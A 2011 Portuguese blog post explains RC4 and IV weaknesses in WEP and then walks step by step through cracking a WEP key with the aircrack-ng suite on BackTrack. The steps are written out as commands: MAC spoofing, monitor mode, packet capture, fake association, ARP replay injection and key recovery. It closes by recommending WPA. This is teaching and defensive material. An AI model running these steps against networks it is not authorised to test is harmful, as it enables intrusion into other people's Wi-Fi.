Por que eu não devo usar WEP em minha rede?

By | 31 de agosto de 2011
Print Friendly, PDF & Email

Wired Equivalent Privacy (WEP) é parte do padrão IEEE 802.11 (ratificado em Setembro de 1999), e é um protocolo que se utilizava para proteger redes sem fios do tipo Wi-Fi.

WEP 64-bit (40 bits reais) chave secreta 5 caracteres ASCII e 10 caracteres hexadecimais.
WEP 128-bit (104 bits reais) chave secreta 13 caracteres ASCII e 26 caracteres hexadecimais
WEP 256-bit chave secreta 29 caracteres ASCII e 58 caracteres hexadecimais

Usa o RC4 como protocolo de criptografia que é uma cifra de fluxo e o CRC32 para integridade.
Um vetor de inicialização (Leia IVInitialization Vector) de 24 bits é usado para formar a cifra de fluxo do RC4, o IV é muito pequeno e é enviado em texto puro e segundo o Wikipédia “há uma probabilidade de 50% de que o mesmo VI irá repetir se após 5000 pacotes”.

Então tudo o que a atacante precisa é capturar os pacotes da rede e por analise descobrir a chave WEP.
Se a rede não oferecer a quantidade de IVs necessário é bem certo que o atacante irá injetar dados a fim de ter mais pacotes para ser analisados e quebrados.
Vejas os passos de como ocorre esse tipo de ataque.
Neste exemplo estou usando o BackTrack 5R2 (www.backtrack.org) que já vem com o AirCrack-ng (www.aircrack-ng.org) instalado.
O Aircrack-ng é um conjunto de ferramentas de linha de comando criadas especificamente para capturar e quebrar senhas WEP e WPA-PSK.

De todo o conjunto será usado as seguintes ferramentas:

  • airmon-ng – Usado para colocar sua placa de rede no modo monitor.
  • airodump-ng – Usado para monitorar e capturar os pacotes.
  • aireplay-ng – Usado para gerar trafego adicional na rede wifi.
  • aircrack-ng – O Crack que será usado para encontrar a chave WEP.

O comando aireplay-ng faz injeção de pacotes na rede. Você pode testar se sua placa de rede consegue injetar pacotes com o comando:
aireplay-ng -9 wlan0 (veja qual a sua placa e substitua o X)

Parar o modo monitoramento da placa
airmon-ng stop wlan0

Desabilitar a placa
ifconfig wlan0 down

Alterar o MAC da placa de rede
macchanger –mac 00:11:22:33:44:55 wlan0

Iniciar a placa no modo de monitoramento
airmon-ng start wlan0

Note que foi gerada uma placa virtual de captura chamada “mon0”.

image

Uma vez preparado o ambiente inicie a busca por redes:

airodump-ng mon0

Você pode fazer um filtro usando o parametro –encrypt wep

airodump-ng mon0  –encrypt wep

 

image

Anote o BSSID, o Canal (CH) e o ESSID do rede WEP.
Inicie a captura dos pacotes da rede.
airodump-ng -c 6 -w captura –bssid 00:13:10:F2:A5:F5 mon0

–c é o canal
-w nomedoarquivo de captura
–bssid é o id da rede que vamos capturar
mon0 nossa placa de captura.

image

Deve ser criada uma associação fake com o AP (opção –1 do aireplay-ng 0 é o delay)
Em uma nova janela do terminal execute o comando:
aireplay-ng -1 0 -a 00:13:10:F2:A5:F5 -h 00:11:22:33:44:55 mon0 -e HackMe

image

 

Uma vez associado pode ser necessário aumentar o trafego na rede pois como foi explicado no artigo é necessário acima de 5000 pacotes para aumentar a chance de descoberta.

Para isso use o comando aireplay-ng em um novo terminal com o “ataque” –3 que é o envio de ARP-request na rede.
aireplay-ng -3 -b 00:13:10:F2:A5:F5 -h 00:11:22:33:44:55 mon0

image

Aguarde o aumento do valor #DATA ou mais…. e por fim use o comando
aircrack-ng -b 00:13:10:F2:A5:F5 captura-01.cap

image

Nesse caso eu coloquei uma chave pequena de 5 caracteres somente para fins educativos.

Contramedida – Não use WEP use WPA !!